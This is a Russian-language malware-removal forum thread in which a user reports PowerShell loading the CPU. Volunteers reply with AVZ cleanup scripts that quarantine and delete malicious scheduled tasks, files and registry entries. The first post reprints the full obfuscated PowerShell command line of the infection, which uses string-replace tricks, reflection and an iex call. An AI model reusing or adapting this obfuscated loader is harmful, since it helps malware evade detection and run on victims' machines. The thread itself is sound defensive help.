|
Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » [решено] Powershell грузит комп 30-40% |
|
|
[решено] Powershell грузит комп 30-40%
|
Новый участник Сообщения: 7 |
Здраствуйте! Откуда не возьмись начал комп тормозить и подлагивать. Тогда я открыл диспетчер задач, все успокоилось, закрываю диспетчер задач через некоторое время вижу опять начинает тормозить. Тогда я подумал скачать другой диспетчер задач (я использовал Process Explorer с правами администратора), вижу powershell.exe с conhost.exe грузят. Тогда посмотрел расположение стандартное, в Command Line:
(powershell.exe -c "4609833558;$tBUn='5Syxst1emj.M_an_agnemwen4t.5Aubto2mautihonf.AzmsniUatislsk-abmspiIlni{tF7ai+le[d-5NoqnP.ubvli5c,=St)ateic' -replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361);'r$txBU9n=_$t_BU0n t-s_pl)it!''-3'';c[R_efn].yAs)se6mbdlyv.G!ethTy?pe8($8tB6Un}[0_])l.G_et+Fi+el!d(i$t6BU_n[}1]u,$ztB_Un_[2q])t.Szet?Vaslu_e(_$n[ul5l,_(3[615-n+e6]64x))'-replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361)|&('iviiveivx'-replace'iv');'q&(_gc_m (A*_-T/y*i).}Naymeb (g''yrusz_i8ntsg )xShy(1stvne4mi_;u)psdi3ang]_ ]Sy_ys}{t5eg3m.]_I_Ofj;uw_s9i._ngp7 iS_7ys_7t,e_tm./9R{u__nt_.ibm!!e.aoItn/ttei_r_o_6pSrbe_rurvi.-c,e[3s;}{ubs,5in[9g8 _9Mi__cir!_os/3o,f}7t.faW_icun3_e23;e_pug_b,lylicre hc_[lag8s]s+p e0}q_{6nde](lfe4)gadptte}( vdqo_i_ad rap7V_tD(i})5;k_pu_vb3lmdicu_ _s_ota_at_ig7c +hv.og0ido+ 7F_bLlgodt(_b){ckbyyuktes)[h]3_UY?!K!r77=F}-iyl[_e.__E.x0iis_rt_sc_(bk7oqq_/iy,_u!e1_rh__f8t_=wt_mbto_7qin_)_?_)Fi7el}ea1.Rmfe_am_dAj_l{l4lBy__tbefts(ocb]o,{qixcy4u7ser_lhufb[tw_{t9ba)oq)fio)b5 ![]() ![]() Вот это пишет. Помогите пожалуйста, вот логи прикрепил. |
|
Отправлено: 16:22, 05-11-2021 |
Ветеран Сообщения: 5318
|
Профиль | Отправить PM | Цитировать Здравствуйте!
1. Пожалуйста, скачайте MiniRegTool64.zip и распакуйте его.
2. Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению. После перезагрузки системы соберите новый CollectionLog Автологером. |
------- Отправлено: 16:31, 05-11-2021 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Ветеран Сообщения: 1511
|
Профиль | Отправить PM | Цитировать +
- выполните такой скрипт в AVZ begin ClearQuarantineEx(true); QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinDAT', ''); QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinNAT', ''); ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine_task .\Quarantine\*', 1, 300000, false); RebootWindows(false); end. |
------- Отправлено: 16:45, 05-11-2021 | #3 |
Новый участник Сообщения: 7
|
Профиль | Отправить PM | Цитировать Спасибо что ответили! Вот я прикрепил AV_block_remove.log, но result.txt весит у меня 17 мб поэтому я незнаю как вам кинуть лог.
|
Отправлено: 16:56, 05-11-2021 | #4 |
Новый участник Сообщения: 7
|
Профиль | Отправить PM | Цитировать Вот ещё один лог.
|
|
Отправлено: 17:04, 05-11-2021 | #5 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Цитата VladikShok:
|
|
Отправлено: 17:30, 05-11-2021 | #6 |
Новый участник Сообщения: 7
|
Профиль | Отправить PM | Цитировать https://dropmefiles.com/7FYJq вот CollectionLog.
|
Отправлено: 17:37, 05-11-2021 | #7 |
Новый участник Сообщения: 7
|
Профиль | Отправить PM | Цитировать 2021.11.05_quarantine_845c9f5c92e499333f2dfcc8ecfddd52.7z вот имя карантина.
|
Отправлено: 18:11, 05-11-2021 | #8 |
Ветеран Сообщения: 1511
|
Профиль | Отправить PM | Цитировать Здравствуйте!
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ из папки Autologger\AV\av_z.exe (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs', ''); QuarantineFileF('C:\ProgramData\Windows\Profile', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\ProgramData\Windows\Profile\1.vbs', '64'); DeleteFileMask('C:\ProgramData\Windows\Profile', '*', true); DeleteDirectory('C:\ProgramData\Windows\Profile'); DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT'); DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT'); RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '32'); RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '64'); RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','yuerhftwt'); RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','jhytvrvr'); if FileExists (GetAVZDirectory+'quarantine.7z') then DeleteFile(GetAVZDirectory+'quarantine.7z'); ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. Файл quarantine.7z из папки AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма. Профиксите в HijackThis из папки ..\AutoLogger\HiJackThis O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file) O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file) O22 - Task: (damaged) OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-1002 - C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing) (user missing) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift. |
------- Последний раз редактировалось regist, 05-11-2021 в 19:19. Причина: пользователь выложил Result.txt Отправлено: 18:57, 05-11-2021 | #9 |
Ветеран Сообщения: 1511
|
Профиль | Отправить PM | Цитировать Цитата VladikShok:
В папке с AVbr есть файл quarantine.zip ? Если да, то какого размера? |
|
------- Отправлено: 19:23, 05-11-2021 | #10 |
|
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Разное - 30-40% CPU тормозит мышка и клавиатура | Ыть | Microsoft Windows 10 | 2 | 09-11-2015 13:16 | |
Службы - rundll32 грузит cpu на 30-40% в простое | 12sunflowers | Microsoft Windows 7 | 14 | 24-06-2015 10:45 | |
[решено] ОС загружается 30-40 минут. | Shtaizek | Непонятные проблемы с Железом | 23 | 20-08-2012 18:42 | |
Компьютер тормозит после 30-40 минут работы | Slider* | Непонятные проблемы с Железом | 6 | 24-01-2009 13:49 |
|